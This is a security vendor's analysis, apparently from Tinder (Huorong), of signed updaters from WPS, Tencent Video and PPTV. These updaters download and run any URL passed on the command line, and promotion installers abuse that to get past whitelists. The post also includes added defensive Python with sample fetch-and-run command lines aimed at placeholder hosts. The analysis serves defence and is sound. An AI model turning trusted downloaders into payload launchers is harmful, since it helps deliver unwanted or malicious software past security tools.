Tinder Safety · 2016/04/22 18:45

0x00 Background

A “whitelist” is a set of trusted objects, the counterpart of a “blacklist”, and is often used to implement “exclusion” logic. In the security field, a whitelist is usually used to optimize the analysis of trusted objects or to suppress the false positives produced by scanning, removal and interception logic.

In domestic security circles, however, there is a practice of “white-or-black” detection: samples are scanned with very broad heuristic logic such as statistical algorithms, and the false positives such heuristics produce are suppressed by a high-coverage “whitelist” cloud (commonly just called “the cloud”). The logic is easy to follow: there are far more “white” files than “black” files, so a whitelist clearly “raises” the detection rate if false positives are ignored. This is also why we so often see security software users asking on the web: “Why did a certain security product flag the program I just compiled as a virus?”

In addition, some security software uses the whitelist to “optimize the user experience”, for example by neither analyzing nor blocking the behavior of whitelisted programs.

“Trust”, however, is often accompanied by flaws, which may be rooted in program logic or even in human nature. Because these vulnerabilities are created by the trust mechanism, we usually call them “trust vulnerabilities”. Virus authors often try to exploit the trust vulnerabilities of security software, looking for ways to use programs on the security software’s whitelist to carry out malicious behavior. We call this kind of technique “trust exploitation”, or “white carrying black”. The virus author reported in the news some time ago bribed staff of a security software vendor to add his virus program to that product’s whitelist for exactly this purpose.

Tinder’s Software Installation Interception recently intercepted a silent installation package called “Lightspeed Desktop Search” (Figure 1, Figure 2), which attempted to silently push the installation of multiple applications through trust-exploitation techniques.

Figure 1. Silent installation package of “Lightspeed Desktop Search”

Figure 2. Tinder “Software installation interception” prompt

0x01 Analysis

After running, this “Lightspeed Desktop Search” silent installation package (hereafter “Lightspeed Desktop Search”) drops a file named qDW.exe. Looking at the file information, we found that the file carries a valid Kingsoft digital signature, and analysis quickly showed that qDW.exe is actually the WPS upgrade program (Figure 3, Figure 4).

Figure 3. File description information

Figure 4. A valid file signature

Next, Lightspeed Desktop Search uses command-line parameters supported by the WPS upgrade program to download and execute the promotion software in the background, as shown in Figures 5 and 6:

Figure 5. “Lightspeed Desktop Search” uses the WPS upgrade for rogue promotion

Figure 6. “Lightspeed Desktop Search” uses the WPS upgrade for rogue promotion

Because this WPS upgrade program takes its download link from command-line parameters, anyone can easily substitute a different download address, and the program verifies neither the link nor the downloaded file, so it can be made to download and run any program. Since this WPS upgrade program, signed in 2011, has been added to the whitelist of every security product, Lightspeed Desktop Search was able to use it in a textbook “trust exploitation” and brazenly carry out rogue promotion.

0x02 Extension

From Kingsoft’s digital signature, we found that this WPS upgrade program was created in 2011. After so many years of development, do regular software products still have this kind of loophole?

Through the Tinder Security Intelligence Analysis System we found that such vulnerabilities are not limited to Kingsoft: Tencent Video, QQ Video, PPLive and other software have the same flaw in their program design, and virus authors can download and execute any program through the software’s own components. As shown in Figures 7, 8 and 9:

Figure 7. Command line of the Tencent Video promotion program

Figure 8. Command line of the QQ Video promotion program

Figure 9. PPLive promotion program command line

Tencent Video optionally promotes some third-party software during installation (Figure 10), and the problem lies in the program St******cs.exe that downloads the installation package. The program does not verify the validity of its parameters; it simply takes the download link from the parameter and automatically completes the download and execution (Figure 11). The website shown in Figure 12 is a test server I set up. I uploaded the Microsoft calculator program to this server, copied the St******cs.exe program to the root directory of drive C, added the parameters and ran the program, and the calculator program was successfully downloaded and run.

Figure 10. Tencent Video promotes third-party applications

Figure 11. Tencent Video downloads and runs the promotion package through St******cs.exe

Figure 12. Tencent St******cs.exe vulnerability test

By analyzing St******cs.exe, we found that after obtaining the command line the program looks for the parameter “-b*** URL”. If it finds the parameter, it takes the download link the parameter provides and, without validating the link in any way, hands it to the download function. As shown in Figure 13:

Figure 13. Tencent St******cs.exe obtains the download link

In the download function, we can see that the program does not validate the link either; it directly creates a directory and downloads from the Internet (Figure 14).

Figure 14. Tencent St******cs.exe downloads and runs the program
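Added example, not code from the original article or from any of the vendors it names: the downloader pattern described above (take a URL from a command-line flag, fetch it, run whatever comes back) next to a hardened version that requires HTTPS, pins the host to the vendor's update server and verifies the payload's SHA-256 against a manifest before anything is executed. The flag name `-burl`, the host names, the manifest and the in-memory "network" are all constructed stand-ins so the example runs offline.

```python
import hashlib
import hmac
from urllib.parse import urlparse

# Assumed vendor update host; a real updater would embed its own.
ALLOWED_HOSTS = {"update.vendor.example"}

# Constructed stand-in for the Internet: URL -> payload bytes.
FAKE_NET = {
    "https://update.vendor.example/wps_patch.exe": b"MZ-legit-patch",
    "https://update.vendor.example/mirror/wps_patch.exe": b"MZ-tampered",
    "http://promo.unknown.example/bundle.exe": b"MZ-unwanted-promo",
}

# Constructed update manifest that the vendor would ship with (or sign for)
# the updater: file name -> expected SHA-256 of the payload.
MANIFEST = {
    "wps_patch.exe": hashlib.sha256(b"MZ-legit-patch").hexdigest(),
}


def parse_url_arg(argv, flag="-burl"):
    """Return the value following the download flag, or None.
    The flag name is hypothetical; the article masks the real one."""
    for i, arg in enumerate(argv):
        if arg == flag and i + 1 < len(argv):
            return argv[i + 1]
    return None


def fetch(url):
    """Stand-in for the HTTP download; raises the way a 404 would."""
    if url not in FAKE_NET:
        raise LookupError(url)
    return FAKE_NET[url]


def run_update_unsafe(argv, execute):
    """The pattern the article describes: trust the URL, run what comes back."""
    url = parse_url_arg(argv)
    if url is None:
        return None
    payload = fetch(url)
    execute(payload)  # no scheme check, no host pinning, no payload check
    return url


def validate_url(url):
    """Reject plaintext transport and any host other than the vendor's."""
    parts = urlparse(url)
    if parts.scheme != "https":
        raise ValueError("non-HTTPS download link rejected")
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError(f"host {parts.hostname!r} is not the vendor update host")
    return parts


def run_update_safe(argv, execute):
    """Hardened updater: pin the host, require TLS, and verify the payload
    hash against the manifest before executing."""
    url = parse_url_arg(argv)
    if url is None:
        return None
    parts = validate_url(url)
    name = parts.path.rsplit("/", 1)[-1]
    expected = MANIFEST.get(name)
    if expected is None:
        raise ValueError(f"{name!r} is not in the update manifest")
    payload = fetch(url)
    actual = hashlib.sha256(payload).hexdigest()
    if not hmac.compare_digest(actual, expected):
        raise ValueError("payload hash mismatch, refusing to execute")
    execute(payload)
    return url


def demo():
    """Run both updaters against the same attacker-controlled command line."""
    executed = []
    argv = ["updater.exe", "-burl", "http://promo.unknown.example/bundle.exe"]
    run_update_unsafe(argv, executed.append)
    try:
        run_update_safe(argv, executed.append)
        blocked = False
    except ValueError:
        blocked = True
    return {"unsafe_ran": len(executed), "safe_blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

The host pin alone is not enough: the `mirror/wps_patch.exe` entry sits on the allowed host but carries different bytes, and it is the manifest hash check that stops it. A production updater would sign the manifest and check the downloaded file's Authenticode signature as well, but the order of checks is the point: validate the link before fetching, and verify the bytes before executing.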

PPTV also silently promotes third-party software during installation. At installation time PPTV drops a program L****r.exe to download the installation package, which carries a valid PPTV digital signature (Figure 15). Testing showed that this program likewise does not verify the security of the download link or of the downloaded program; by modifying the command-line parameters, it could be made to download and run a program from any specified download link (Figure 16).

Figure 15. PPTV download program

Figure 16. PPTV vulnerability test

After a simple analysis, we found that this program behaves just like Tencent’s download program: after obtaining the download link from its parameters, it simply downloads and executes without any security verification (Figures 17 and 18).

Figure 17. PPTV L****r.exe obtains the download link and builds the save path

Figure 18. PPTV L****r.exe downloads and executes any program

0x03 Review

Based on interception data collected by the Tinder Security Intelligence Analysis System, we found that many software products have the design vulnerabilities described in this article. Some of these programs have already been used by virus or rogue-software authors: through the software’s design loopholes they exploit the “trust vulnerability” of security software to evade scanning and interception, and then carry out malicious or rogue behavior.
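An added example, not part of the original article, of the kind of detection logic a security product or SOC could run over process-creation telemetry to catch this abuse rather than whitelisting the signed binary outright: a known vendor downloader launched by an unrelated installer, or told to fetch from a host the vendor does not use, gets flagged even though its signature is valid. The updater profiles, hosts, flag name and sample events are constructed; qDW.exe is the only name taken from the article, and its legitimate update host and parent processes are assumptions.

```python
import re
from urllib.parse import urlparse

# Hypothetical profiles of signed vendor downloaders: the hosts each one
# legitimately fetches from and the parents that normally launch it.
# qDW.exe is the WPS updater named in the article; its host and parents
# here are assumed, and vendordl.exe is entirely made up.
UPDATER_PROFILES = {
    "qdw.exe": {
        "hosts": {"update.wps.example"},
        "parents": {"wps.exe", "wpsupdate.exe"},
    },
    "vendordl.exe": {
        "hosts": {"dl.vendor.example"},
        "parents": {"vendorsetup.exe"},
    },
}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path):
    """Last path component, lower-cased, for Windows or POSIX paths."""
    return re.split(r"[\\/]", path)[-1].lower()


def analyze_event(event):
    """Return the findings for one process-creation event, or None when the
    image is not a profiled downloader (so the rule stays silent on it)."""
    image = basename(event["image"])
    profile = UPDATER_PROFILES.get(image)
    if profile is None:
        return None
    findings = []
    # Any URL on the command line must point at a host the vendor uses.
    for url in URL_RE.findall(event["cmdline"]):
        host = (urlparse(url).hostname or "").lower()
        if host not in profile["hosts"]:
            findings.append(f"{image}: download URL targets unprofiled host {host!r}")
    # The downloader should be started by the vendor's own software, not by
    # some third-party installer that merely dropped a copy of it.
    parent = basename(event["parent"])
    if parent not in profile["parents"]:
        findings.append(f"{image}: launched by unexpected parent {parent!r}")
    return findings


def scan(events):
    """Run analyze_event over a batch; return (pid, findings) for hits only."""
    alerts = []
    for event in events:
        findings = analyze_event(event)
        if findings:
            alerts.append((event["pid"], findings))
    return alerts


# Constructed sample of process-creation events in Sysmon-like fields.
# Not real telemetry; the second event mirrors the article's scenario of a
# third-party installer dropping the signed updater and pointing it elsewhere.
SAMPLE_EVENTS = [
    {"pid": 1001,
     "image": r"C:\Program Files\Kingsoft\WPS\qDW.exe",
     "parent": r"C:\Program Files\Kingsoft\WPS\wps.exe",
     "cmdline": r'"C:\Program Files\Kingsoft\WPS\qDW.exe" -burl https://update.wps.example/patch.exe'},
    {"pid": 1002,
     "image": r"C:\Users\u\AppData\Local\Temp\qDW.exe",
     "parent": r"C:\Users\u\Downloads\LightspeedSearch_setup.exe",
     "cmdline": r"qDW.exe -burl http://promo.unknown.example/bundle.exe"},
    {"pid": 1003,
     "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_EVENTS):
        print(pid, findings)
```

The rule deliberately keys on behaviour (who launched the binary, where it was told to fetch from) rather than on the signer, which is exactly the property a whitelist built on signatures alone cannot see. Profiles like these are cheap to maintain for a handful of known downloaders and give a scanner a way to keep the vendor binary trusted in its normal context while still intercepting its abuse.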

Here, tinder appeals:

  1. Security software vendors should improve the accuracy of their interception and removal technology, make reasonable use of whitelists, and close “trust vulnerabilities” at the level of logic and mechanism.
  2. Software vendors should also raise their awareness of code security and effectively validate the input data their programs receive, so that a program’s functional logic cannot be turned into a tool in the hands of criminals.